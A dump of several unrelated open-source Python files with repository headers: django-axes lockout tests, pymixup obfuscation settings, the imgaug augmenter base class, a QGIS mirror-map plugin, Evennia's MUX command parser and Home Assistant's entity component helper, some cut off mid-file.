IP_2 = "127.1.0.2"
def setUp(self):
super().setUp()
self.create_attempt()
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_1, ip_address=self.IP_2)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_1)
self.create_attempt(username=self.USERNAME_2, ip_address=self.IP_2)
self.request = HttpRequest()
def test_reset(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
def test_reset_username(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
def test_reset_ip_username(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_user_failures(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_user_failures(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_ONLY_USER_FAILURES=True)
def test_reset_ip_username_user_failures(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_user_or_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_user_or_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_IP=True)
def test_reset_ip_username_user_or_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 2)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_user_and_ip(self):
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 5)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_ip_user_and_ip(self):
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_COMBINATION_USER_AND_IP=True)
def test_reset_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
@override_settings(AXES_LOCK_OUT_BY_USER_OR_AND=True)
def test_reset_ip_username_user_and_ip(self):
self.request.GET["username"] = self.USERNAME_1
self.request.META["REMOTE_ADDR"] = self.IP_1
reset_request(self.request)
self.assertEqual(AccessAttempt.objects.count(), 3)
rdevost/pymixup | common/settings.py | Python | mit | 4,238 | 0
from os.path import expanduser
######################
# Common project files
######################
# These are files, packages, and folders that will be copied from the
# development folder to the destination obfuscated project.
######################
# Python packages to obfuscate.
obfuscated_packages = [
'controller',
'db',
'dbdata',
'logic',
'migrations',
'platform_api',
'tests',
'view'
]
# Non-python folders and Python packages that are not obfuscated.
# Note: Tests are a special case: both obfuscated and unobfuscated versions
# are desired.
unobfuscated_folders = [
'csvlite',
'fonts',
'help',
'images', 'initial_data', 'international',
'kivygraph',
'tests',
]
# Required files or types in the project directory (that is, the base
# directory in which all the common packages exist in) that must be
# obfuscated. For example, main.py is not in any of the common packages, but
# should be obfuscated and included in the project, so *.py (or alternatively,
# main.py) is included here.
obfuscated_root_files = [
'*.kv',
'*.py',
]
# Required files or types in the project directory that should not be
# obfuscated.
unobfuscated_root_files = [
'*.ini',
'*.txt',
]
#####################
# Default directories
#####################
# A project is moved through directories as follows:
# 1. It is copied into IMPORTED (use import_project/fabfile.py).
# 2. The IMPORTED project is obfuscated and written into OBFUSCATED (run
# pymixup.py).
# 3. When an obfuscated project is ready to test, it is copied into
# EXPORTED for a particular platform (e.g., for ios, use
# export_ios/fabfile.py).
# If no platform is specified, it will be copied into a folder called
# "default".
# 4. When an exported project is deployed, it is copied into DEPLOYED under
# its version number.
#
# Note that files in IMPORTED, OBFUSCATED, and EXPORTED are overwritten with
# each refresh from the development project. When a project is deployed,
# however, a permanent copy is retained under its version number.
#####################
# Project name. This should be the name of the last folder in the project
# path. The name is appended to the directories below.
project_name = 'MyProject'
# The base directory of the project to obfuscate.
# For example, the base directory of a project in '~/projects/MyProject' would
# be '~/projects'
project_base_dir = expanduser('~/PycharmProjects')
# The directory to copy the imported development project files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name will be appended to the directory.
# For example, specify '~/projects/IMPORTED' to have the files from the
# project MyProject copied into '~/projects/IMPORTED/MyProject'.
imported_dir = expanduser('~/projects/IMPORTED')
# The directory to write the obfuscated files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/OBFUSCATED' is specified, then the project
# MyProject obfuscated for the android platform will be placed in
# '~/projects/OBFUSCATED/MyProject/android'.
obfuscated_dir = expanduser('~/projects/OBFUSCATED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# The project_name and platform will be appended to the directory.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject exported for the android platform will be placed in
# '~/projects/EXPORTED/MyProject/android'.
exported_dir = expanduser('~/projects/EXPORTED')
# The directory to write the exported files to.
# Make sure this base directory exists; the fabfile scripts expects it.
# For example, if '~/projects/EXPORTED' is specified, then the project
# MyProject deployed for the android platform for version 1.3.2 will be placed
# in '~/projects/DEPLOYED/MyProject/android/1.3.2'.
deployed_dir = expanduser('~/projects/DEPLOYED')
# The directory that contains extra files and folders needed for the project.
extras_dir = expanduser('~/project/EXTRAS')
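# Editor's sketch: the concrete paths implied by the settings above, for a
# hypothetical android build of version 1.3.2.
import os.path
def _stage_paths(platform='android', version='1.3.2'):
    return {
        'imported': os.path.join(imported_dir, project_name),
        'obfuscated': os.path.join(obfuscated_dir, project_name, platform),
        'exported': os.path.join(exported_dir, project_name, platform),
        'deployed': os.path.join(deployed_dir, project_name, platform, version),
    }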
CKboss/TheBauble | Tensorflow/CNN/ResNet/imgaug/augmenters.py | Python | gpl-3.0 | 129,266 | 0.003458
from __future__ import print_function, division, absolute_import
from . import imgaug as ia
from .parameters import StochasticParameter, Deterministic, Binomial, Choice, DiscreteUniform, Normal, Uniform
from abc import ABCMeta, abstractmethod
import random
import numpy as np
import copy as copy_module
import re
import math
from scipy import misc, ndimage
from skimage import transform as tf, segmentation, measure
import itertools
import cv2
import six
import six.moves as sm
import types
"""
TODOs
- check if all get_parameters() implementations really return all parameters.
- Add Alpha augmenter
- Add WithChannels augmenter
- Add SpatialDropout augmenter
- Add CoarseDropout shortcut function
- Add Hue and Saturation augmenters
"""
@six.add_metaclass(ABCMeta)
class Augmenter(object):
"""Base class for Augmenter objects
Parameters
----------
name : string, optional
Name given to an Augmenter object
deterministic : boolean, optional (default=False)
Whether random state will be saved before augmenting images
and then will be reset to the saved value post augmentation
use this parameter to obtain transformations in the EXACT order
        every time
random_state : int, RandomState instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If RandomState instance, random_state is the random number generator;
If None, the random number generator is the RandomState instance used
by `np.random`.
"""
def __init__(self, name=None, deterministic=False, random_state=None):
super(Augmenter, self).__init__()
if name is None:
self.name = "Unnamed%s" % (self.__class__.__name__,)
else:
self.name = name
self.deterministic = deterministic
if random_state is None:
if self.deterministic:
self.random_state = ia.new_random_state()
else:
self.random_state = ia.current_random_state()
elif isinstance(random_state, np.random.RandomState):
self.random_state = random_state
else:
self.random_state = np.random.RandomState(random_state)
self.activated = True
def augment_batches(self, batches, hooks=None):
"""Augment images, batch-wise
Parameters
----------
batches : array-like, shape = (num_samples, height, width, channels)
image batch to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
augmented_batch : array-like, shape = (num_samples, height, width, channels)
corresponding batch of augmented images
"""
assert isinstance(batches, list)
return [self.augment_images(batch, hooks=hooks) for batch in batches]
def augment_image(self, image, hooks=None):
"""Augment a single image
Parameters
----------
image : array-like, shape = (height, width, channels)
The image to augment
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
img : array-like, shape = (height, width, channels)
The corresponding augmented image
"""
assert len(image.shape) == 3, "Expected image to have shape (height, width, channels), got shape %s." % (image.shape,)
return self.augment_images([image], hooks=hooks)[0]
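    # Editor's sketch: a minimal concrete subclass (hypothetical) showing the
    # _augment_images contract -- an identity augmenter:
    # class Noop(Augmenter):
    #     def _augment_images(self, images, random_state, parents, hooks):
    #         return images
    #     def get_parameters(self):
    #         return []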
def augment_images(self, images, parents=None, hooks=None):
"""Augment multiple images
Parameters
----------
images : array-like, shape = (num_samples, height, width, channels) or
a list of images (particularly useful for images of various
dimensions)
images to augment
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
images_result : array-like, shape = (num_samples, height, width, channels)
corresponding augmented images
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksImages()
if ia.is_np_array(images):
assert len(images.shape) == 4, "Expected 4d
|
array of form (N, height, width, channels), got shape %s." % (str(images.shape),)
assert images.dtype == np.uint8, "Expected dtype uint8 (with value range 0 to 255), got dtype %s." % (str(images.dtype),)
images_tf = images
elif ia.is_iterable(images):
if len(images) > 0:
assert all([len(image.shape) == 3 for image in images]), "Expected list of images with each image having shape (height, width, channels), got shapes %s." % ([image.shape for image in images],)
assert all([image.dtype == np.uint8 for image in images]), "Expected dtype uint8 (with value range 0 to 255), got dtypes %s." % ([str(image.dtype) for image in images],)
images_tf = list(images)
else:
raise Exception("Expected list/tuple of numpy arrays or one numpy array, got %s." % (type(images),))
if isinstance(images_tf, list):
images_copy = [np.copy(image) for image in images]
else:
images_copy = np.copy(images)
images_copy = hooks.preprocess(images_copy, augmenter=self, parents=parents)
if hooks.is_activated(images_copy, augmenter=self, parents=parents, default=self.activated):
if len(images) > 0:
images_result = self._augment_images(
images_copy,
random_state=ia.copy_random_state(self.random_state),
parents=parents,
hooks=hooks
)
self.random_state.uniform()
else:
images_result = images_copy
else:
images_result = images_copy
images_result = hooks.postprocess(images_result, augmenter=self, parents=parents)
if self.deterministic:
self.random_state.set_state(state_orig)
if isinstance(images_result, list):
assert all([image.dtype == np.uint8 for image in images_result]), "Expected list of dtype uint8 as augmenter result, got %s." % ([image.dtype for image in images_result],)
else:
assert images_result.dtype == np.uint8, "Expected dtype uint8 as augmenter result, got %s." % (images_result.dtype,)
return images_result
@abstractmethod
def _augment_images(self, images, random_state, parents, hooks):
raise NotImplementedError()
def augment_keypoints(self, keypoints_on_images, parents=None, hooks=None):
"""Augment image keypoints
Parameters
----------
keypoints_on_images : # TODO
parents : optional(default=None)
# TODO
hooks : optional(default=None)
HooksImages object to dynamically interfere with the Augmentation process
Returns
-------
keypoints_on_images_result : # TODO
"""
if self.deterministic:
state_orig = self.random_state.get_state()
if parents is None:
parents = []
if hooks is None:
hooks = ia.HooksKeypoints()
assert ia.is_iterable(keypoints_on_images)
assert all([isinstance(keypoints_on_image, ia.KeypointsOnImage) for keypoints_on_image in keypoints_on_images])
keypoints_on_images_copy = [keypoints_on_image.deepcopy() for keypoints_on_image in keypoints_on_images]
keypoints_on_images_copy = hooks.preprocess(keypoints_on_images_copy, augmenter=self, parents=parents)
        if hooks.is_activated(keypoints_on_images_copy, augmenter=self, parents=parents, default=self.activated):
alfanugraha/LUMENS-repo | processing/DockableMirrorMap/dockableMirrorMapPlugin.py | Python | gpl-2.0 | 8,306 | 0.032145
# -*- coding: utf-8 -*-
"""
/***************************************************************************
Name : Dockable MirrorMap
Description : Creates a dockable map canvas
Date : February 1, 2011
copyright : (C) 2011 by Giuseppe Sucameli (Faunalia)
email : brush.tyler@gmail.com
***************************************************************************/
/***************************************************************************
* *
* This program is free software; you can redistribute it and/or modify *
* it under the terms of the GNU General Public License as published by *
* the Free Software Foundation; either version 2 of the License, or *
* (at your option) any later version. *
* *
***************************************************************************/
"""
from PyQt4.QtCore import *
from PyQt4.QtGui import *
from qgis.core import *
from qgis.gui import *
import resources_rc
class DockableMirrorMapPlugin:
def __init__(self, iface):
# Save a reference to the QGIS iface
self.iface = iface
def initGui(self):
self.dockableMirrors = []
self.lastDockableMirror = 0
        self.dockableAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/dockablemirrormap.png"), "Dockable MirrorMap", self.iface.mainWindow())
QObject.connect(self.dockableAction, SIGNAL("triggered()"), self.runDockableMirror)
self.aboutAction = QAction(QIcon(":/plugins/DockableMirrorMap/icons/about.png"), "About", self.iface.mainWindow())
QObject.connect(self.aboutAction, SIGNAL("triggered()"), self.about)
# Add to the plugin menu and toolbar
self.iface.addPluginToMenu("Dockable MirrorMap", self.dockableAction)
self.iface.addPluginToMenu("Dockable MirrorMap", self.aboutAction)
self.iface.addToolBarIcon(self.dockableAction)
QObject.connect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.connect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
def unload(self):
QObject.disconnect(self.iface, SIGNAL("projectRead()"), self.onProjectLoaded)
QObject.disconnect(QgsProject.instance(), SIGNAL("writeProject(QDomDocument &)"), self.onWriteProject)
self.removeDockableMirrors()
# Remove the plugin
self.iface.removePluginMenu("Dockable MirrorMap",self.dockableAction)
self.iface.removePluginMenu("Dockable MirrorMap",self.aboutAction)
self.iface.removeToolBarIcon(self.dockableAction)
def about(self):
from DlgAbout import DlgAbout
DlgAbout(self.iface.mainWindow()).exec_()
def removeDockableMirrors(self):
for d in list(self.dockableMirrors):
d.close()
self.dockableMirrors = []
self.lastDockableMirror = 0
def runDockableMirror(self):
from dockableMirrorMap import DockableMirrorMap
wdg = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = wdg.minimumSize()
maxsize = wdg.maximumSize()
self.setupDockWidget(wdg)
self.addDockWidget(wdg)
wdg.setMinimumSize(minsize)
wdg.setMaximumSize(maxsize)
if wdg.isFloating():
wdg.move(50, 50) # move the widget to the center
def setupDockWidget(self, wdg):
othersize = QGridLayout().verticalSpacing()
if len(self.dockableMirrors) <= 0:
width = self.iface.mapCanvas().size().width()/2 - othersize
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumWidth( width )
wdg.setMaximumWidth( width )
elif len(self.dockableMirrors) == 1:
height = self.dockableMirrors[0].size().height()/2 - othersize/2
wdg.setLocation( Qt.RightDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
elif len(self.dockableMirrors) == 2:
height = self.iface.mapCanvas().size().height()/2 - othersize/2
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setMinimumHeight( height )
wdg.setMaximumHeight( height )
else:
wdg.setLocation( Qt.BottomDockWidgetArea )
wdg.setFloating( True )
def addDockWidget(self, wdg, position=None):
if position == None:
position = wdg.getLocation()
else:
wdg.setLocation( position )
mapCanvas = self.iface.mapCanvas()
oldSize = mapCanvas.size()
prevFlag = mapCanvas.renderFlag()
mapCanvas.setRenderFlag(False)
self.iface.addDockWidget(position, wdg)
wdg.setNumber( self.lastDockableMirror )
self.lastDockableMirror = self.lastDockableMirror+1
self.dockableMirrors.append( wdg )
QObject.connect(wdg, SIGNAL( "closed(PyQt_PyObject)" ), self.onCloseDockableMirror)
newSize = mapCanvas.size()
if newSize != oldSize:
# trick: update the canvas size
mapCanvas.resize(newSize.width() - 1, newSize.height())
mapCanvas.setRenderFlag(prevFlag)
mapCanvas.resize(newSize)
else:
mapCanvas.setRenderFlag(prevFlag)
def onCloseDockableMirror(self, wdg):
if self.dockableMirrors.count( wdg ) > 0:
self.dockableMirrors.remove( wdg )
if len(self.dockableMirrors) <= 0:
self.lastDockableMirror = 0
def onWriteProject(self, domproject):
if len(self.dockableMirrors) <= 0:
return
QgsProject.instance().writeEntry( "DockableMirrorMap", "/numMirrors", len(self.dockableMirrors) )
for i, dockwidget in enumerate(self.dockableMirrors):
# save position and geometry
floating = dockwidget.isFloating()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/floating" % i, floating )
if floating:
position = "%s %s" % (dockwidget.pos().x(), dockwidget.pos().y())
else:
position = u"%s" % dockwidget.getLocation()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/position" % i, str(position) )
size = "%s %s" % (dockwidget.size().width(), dockwidget.size().height())
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/size" % i, str(size) )
# save the layer list
layerIds = dockwidget.getMirror().getLayerSet()
QgsProject.instance().writeEntry( "DockableMirrorMap", "/mirror%s/layers" % i, layerIds )
scaleFactor = dockwidget.getMirror().scaleFactor.value()
QgsProject.instance().writeEntryDouble("DockableMirrorMap", "/mirror%s/scaleFactor" % i, scaleFactor)
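        # For two docked mirrors this writes project entries like:
        #   DockableMirrorMap/numMirrors       -> 2
        #   DockableMirrorMap/mirror0/floating -> False
        #   DockableMirrorMap/mirror0/position -> "2"  (Qt dock-area constant)
        #   DockableMirrorMap/mirror0/size     -> "400 300"
        #   DockableMirrorMap/mirror0/layers   -> [layer ids shown in the mirror]
        # (illustrative values; onProjectLoaded() below parses them back)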
def onProjectLoaded(self):
# restore mirrors?
num, ok = QgsProject.instance().readNumEntry("DockableMirrorMap", "/numMirrors")
if not ok or num <= 0:
return
# remove all mirrors
self.removeDockableMirrors()
mirror2lids = {}
# load mirrors
for i in range(num):
if num >= 2:
if i == 0:
prevFlag = self.iface.mapCanvas().renderFlag()
self.iface.mapCanvas().setRenderFlag(False)
elif i == num-1:
self.iface.mapCanvas().setRenderFlag(True)
from dockableMirrorMap import DockableMirrorMap
dockwidget = DockableMirrorMap(self.iface.mainWindow(), self.iface)
minsize = dockwidget.minimumSize()
maxsize = dockwidget.maximumSize()
# restore position
floating, ok = QgsProject.instance().readBoolEntry("DockableMirrorMap", "/mirror%s/floating" % i)
if ok:
dockwidget.setFloating( floating )
position, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/position" % i)
if ok:
try:
if floating:
parts = position.split(" ")
if len(parts) >= 2:
dockwidget.move( int(parts[0]), int(parts[1]) )
else:
dockwidget.setLocation( int(position) )
except ValueError:
pass
# restore geometry
dockwidget.setFixedSize( dockwidget.geometry().width(), dockwidget.geometry().height() )
size, ok = QgsProject.instance().readEntry("DockableMirrorMap", "/mirror%s/size" % i)
if ok:
try:
parts = size.split(" ")
dockwidget.setFixedSize( int(parts[0]), int(parts[1]) )
except ValueError:
pass
scaleFactor, ok = QgsProject.instance().readDoubleEntry("DockableMirrorMap", "/mirror%s/scaleFactor" % i, 1.0)
if ok: dockwidget.getMirror().scaleFactor.setValue( scaleFactor )
# get layer list
layerIds, ok = QgsProject.instance().readListEntry("DockableMirrorMap", "/mirror%s/layers" % i)
            if ok: dockwidget.getMirror().setLayerSet( layerIds )
emergebtc/muddery | evennia/evennia/commands/default/muxcommand.py | Python | bsd-3-clause | 8,473 | 0.002124
"""
The command template for the default MUX-style command set. There
is also a Player/OOC version that makes sure the caller is a Player object.
"""
from evennia.utils import utils
from evennia.commands.command import Command
# limit symbol import for API
__all__ = ("MuxCommand", "MuxPlayerCommand")
class MuxCommand(Command):
"""
This sets up the basis for a MUX command. The idea
is that most other Mux-related commands should just
inherit from this and don't have to implement much
parsing of their own unless they do something particularly
advanced.
Note that the class's __doc__ string (this text) is
used by Evennia to create the automatic help entry for
the command, so make sure to document consistently here.
"""
def has_perm(self, srcobj):
"""
This is called by the cmdhandler to determine
if srcobj is allowed to execute this command.
We just show it here for completeness - we
are satisfied using the default check in Command.
"""
return super(MuxCommand, self).has_perm(srcobj)
def at_pre_cmd(self):
"""
This hook is called before self.parse() on all commands
"""
pass
def at_post_cmd(self):
"""
This hook is called after the command has finished executing
(after self.func()).
"""
pass
def parse(self):
"""
This method is called by the cmdhandler once the command name
has been identified. It creates a new set of member variables
that can be later accessed from self.func() (see below)
The following variables are available for our use when entering this
method (from the command definition, and assigned on the fly by the
cmdhandler):
self.key - the name of this command ('look')
self.aliases - the aliases of this cmd ('l')
self.permissions - permission string for this command
self.help_category - overall category of command
self.caller - the object calling this command
self.cmdstring - the actual command name used to call this
(this allows you to know which alias was used,
for example)
self.args - the raw input; everything following self.cmdstring.
self.cmdset - the cmdset from which this command was picked. Not
often used (useful for commands like 'help' or to
list all available commands etc)
self.obj - the object on which this command was defined. It is often
the same as self.caller.
A MUX command has the following possible syntax:
name[ with several words][/switch[/switch..]] arg1[,arg2,...] [[=|,] arg[,..]]
The 'name[ with several words]' part is already dealt with by the
cmdhandler at this point, and stored in self.cmdstring (we don't use
it here). The rest of the command is stored in self.args, which can
start with the switch indicator /.
This parser breaks self.args into its constituents and stores them in the
following variables:
self.switches = [list of /switches (without the /)]
self.raw = This is the raw argument input, including switches
self.args = This is re-defined to be everything *except* the switches
self.lhs = Everything to the left of = (lhs:'left-hand side'). If
no = is found, this is identical to self.args.
self.rhs: Everything to the right of = (rhs:'right-hand side').
If no '=' is found, this is None.
self.lhslist - [self.lhs split into a list by comma]
self.rhslist - [list of self.rhs split into a list by comma]
self.arglist = [list of space-separated args (stripped, including '=' if it exists)]
All args and list members are stripped of excess whitespace around the
strings, but case is preserved.
"""
raw = self.args
args = raw.strip()
# split out switches
switches = []
if args and len(args) > 1 and args[0] == "/":
# we have a switch, or a set of switches. These end with a space.
#print "'%s'" % args
switches = args[1:].split(None, 1)
if len(switches) > 1:
switches, args = switches
switches = switches.split('/')
else:
args = ""
switches = switches[0].split('/')
arglist = [arg.strip() for arg in args.split()]
# check for arg1, arg2, ... = argA, argB, ... constructs
lhs, rhs = args, None
lhslist, rhslist = [arg.strip() for arg in args.split(',')], []
if args and '=' in args:
lhs, rhs = [arg.strip() for arg in args.split('=', 1)]
lhslist = [arg.strip() for arg in lhs.split(',')]
rhslist = [arg.strip() for arg in rhs.split(',')]
# save to object properties:
self.raw = raw
self.switches = switches
self.args = args.strip()
self.arglist = arglist
self.lhs = lhs
self.lhslist = lhslist
self.rhs = rhs
self.rhslist = rhslist
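        # Example: for self.args = "/sw1/sw2 lhs1, lhs2 = rhs1, rhs2" the code
        # above produces:
        #   self.switches == ["sw1", "sw2"]
        #   self.args     == "lhs1, lhs2 = rhs1, rhs2"
        #   self.arglist  == ["lhs1,", "lhs2", "=", "rhs1,", "rhs2"]
        #   self.lhs      == "lhs1, lhs2"  -> self.lhslist == ["lhs1", "lhs2"]
        #   self.rhs      == "rhs1, rhs2"  -> self.rhslist == ["rhs1", "rhs2"]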
def func(self):
"""
This is the hook function that actually does all the work. It is called
by the cmdhandler right after self.parser() finishes, and so has access
to all the variables defined therein.
"""
# a simple test command to show the available properties
string = "-" * 50
string += "\n{w%s{n - Command variables from evennia:\n" % self.key
string += "-" * 50
string += "\nname of cmd (self.key): {w%s{n\n" % self.key
string += "cmd aliases (self.aliases): {w%s{n\n" % self.aliases
string += "cmd locks (self.locks): {w%s{n\n" % self.locks
string += "help category (self.help_category): {w%s{n\n" % self.help_category
string += "object calling (self.caller): {w%s{n\n" % self.caller
string += "object storing cmdset (self.obj): {w%s{n\n" % self.obj
string += "command string given (self.cmdstring): {w%s{n\n" % self.cmdstring
# show cmdset.key instead of cmdset to shorten output
string += utils.fill("current cmdset (self.cmdset): {w%s{n\n" % self.cmdset)
string += "\n" + "-" * 50
string += "\nVariables from MuxCommand baseclass\n"
string += "-" * 50
string += "\nraw argument (self.raw): {w%s{n \n" % self.raw
string += "cmd args (self.args): {w%s{n\n" % self.args
string += "cmd switches (self.switches): {w%s{n\n" % self.switches
        string += "space-separated arg list (self.arglist): {w%s{n\n" % self.arglist
string += "lhs, left-hand side of '=' (self.lhs): {w%s{n\n" % self.lhs
string += "lhs, comma separated (self.lhslist): {w%s{n\n" % self.lhslist
string += "rhs, right-hand side of '=' (self.rhs): {w%s{n\n" % self.rhs
string += "rhs, comma separated (self.rhslist): {w%s{n\n" % self.rhslist
string += "-" * 50
self.caller.msg(string)
class MuxPlayerCommand(MuxCommand):
"""
This is an on-Player version of the MuxCommand. Since these commands sit
on Players rather than on Characters/Objects, we need to check
this in the parser.
Player commands are available also when puppeting a Character, it's
just that they are applied with a lower priority and are always
available, also when disconnected from a character (i.e. "ooc").
This class makes sure that caller is always a Player object, while
creating a new property "character" that is set only if a
character is actually attached to this Player and Session.
"""
def parse(self):
"""
We run the parent parser as usual, then fix the result
"""
super(MuxPlayerCommand, self).parse()
if utils.inherits_from(self.caller, "evennia.objects.objects.DefaultObject"):
# caller is an Object/Character
            self.character = self.caller
tinloaf/home-assistant | homeassistant/helpers/entity_component.py | Python | apache-2.0 | 10,538 | 0
"""Helpers for components that manage entities."""
import asyncio
from datetime import timedelta
from itertools import chain
import logging
from homeassistant import config as conf_util
from homeassistant.setup import async_prepare_setup_platform
from homeassistant.const import (
ATTR_ENTITY_ID, CONF_SCAN_INTERVAL, CONF_ENTITY_NAMESPACE, MATCH_ALL)
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.helpers import config_per_platform, discovery
from homeassistant.helpers.service import extract_entity_ids
from homeassistant.loader import bind_hass
from homeassistant.util import slugify
from .entity_platform import EntityPlatform
DEFAULT_SCAN_INTERVAL = timedelta(seconds=15)
DATA_INSTANCES = 'entity_components'
@bind_hass
async def async_update_entity(hass, entity_id):
"""Trigger an update for an entity."""
domain = entity_id.split('.', 1)[0]
entity_comp = hass.data.get(DATA_INSTANCES, {}).get(domain)
if entity_comp is None:
logging.getLogger(__name__).warning(
'Forced update failed. Component for %s not loaded.', entity_id)
return
entity = entity_comp.get_entity(entity_id)
if entity is None:
logging.getLogger(__name__).warning(
'Forced update failed. Entity %s not found.', entity_id)
return
await entity.async_update_ha_state(True)
class EntityComponent:
"""The EntityComponent manages platforms that manages entities.
This class has the following responsibilities:
- Process the configuration and set up a platform based component.
- Manage the platforms and their entities.
- Help extract the entities from a service call.
- Maintain a group that tracks all platform entities.
- Listen for discovery events for platforms related to the domain.
"""
def __init__(self, logger, domain, hass,
scan_interval=DEFAULT_SCAN_INTERVAL, group_name=None):
"""Initialize an entity component."""
self.logger = logger
self.hass = hass
self.domain = domain
self.scan_interval = scan_interval
self.group_name = group_name
self.config = None
self._platforms = {
domain: self._async_init_entity_platform(domain, None)
}
self.async_add_entities = self._platforms[domain].async_add_entities
self.add_entities = self._platforms[domain].add_entities
hass.data.setdefault(DATA_INSTANCES, {})[domain] = self
@property
def entities(self):
"""Return an iterable that returns all entities."""
        return chain.from_iterable(platform.entities.values() for platform
                                   in self._platforms.values())
def get_entity(self, entity_id):
"""Get an entity."""
for platform in self._platforms.values():
entity = platform.entities.get(entity_id)
if entity is not None:
return entity
return None
def setup(self, config):
"""Set up a full entity component.
This doesn't block the executor to protect from deadlocks.
"""
self.hass.add_job(self.async_setup(config))
async def async_setup(self, config):
"""Set up a full entity component.
Loads the platforms from the config and will listen for supported
discovered platforms.
This method must be run in the event loop.
"""
self.config = config
# Look in config for Domain, Domain 2, Domain 3 etc and load them
tasks = []
for p_type, p_config in config_per_platform(config, self.domain):
tasks.append(self._async_setup_platform(p_type, p_config))
if tasks:
await asyncio.wait(tasks, loop=self.hass.loop)
# Generic discovery listener for loading platform dynamically
# Refer to: homeassistant.components.discovery.load_platform()
async def component_platform_discovered(platform, info):
"""Handle the loading of a platform."""
await self._async_setup_platform(platform, {}, info)
discovery.async_listen_platform(
self.hass, self.domain, component_platform_discovered)
async def async_setup_entry(self, config_entry):
"""Set up a config entry."""
platform_type = config_entry.domain
platform = await async_prepare_setup_platform(
self.hass, self.config, self.domain, platform_type)
if platform is None:
return False
key = config_entry.entry_id
if key in self._platforms:
raise ValueError('Config entry has already been setup!')
self._platforms[key] = self._async_init_entity_platform(
platform_type, platform,
scan_interval=getattr(platform, 'SCAN_INTERVAL', None),
)
return await self._platforms[key].async_setup_entry(config_entry)
async def async_unload_entry(self, config_entry):
"""Unload a config entry."""
key = config_entry.entry_id
platform = self._platforms.pop(key, None)
if platform is None:
raise ValueError('Config entry was never loaded!')
await platform.async_reset()
return True
@callback
def async_extract_from_service(self, service, expand_group=True):
"""Extract all known and available entities from a service call.
Will return all entities if no entities specified in call.
Will return an empty list if entities specified but unknown.
This method must be run in the event loop.
"""
data_ent_id = service.data.get(ATTR_ENTITY_ID)
if data_ent_id in (None, MATCH_ALL):
if data_ent_id is None:
self.logger.warning(
'Not passing an entity ID to a service to target all '
'entities is deprecated. Update your call to %s.%s to be '
'instead: entity_id: "*"', service.domain, service.service)
return [entity for entity in self.entities if entity.available]
entity_ids = set(extract_entity_ids(self.hass, service, expand_group))
return [entity for entity in self.entities
if entity.available and entity.entity_id in entity_ids]
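        # e.g. a call carrying {"entity_id": ["light.kitchen"]} returns just
        # that entity (if available), while entity_id "*", or a missing
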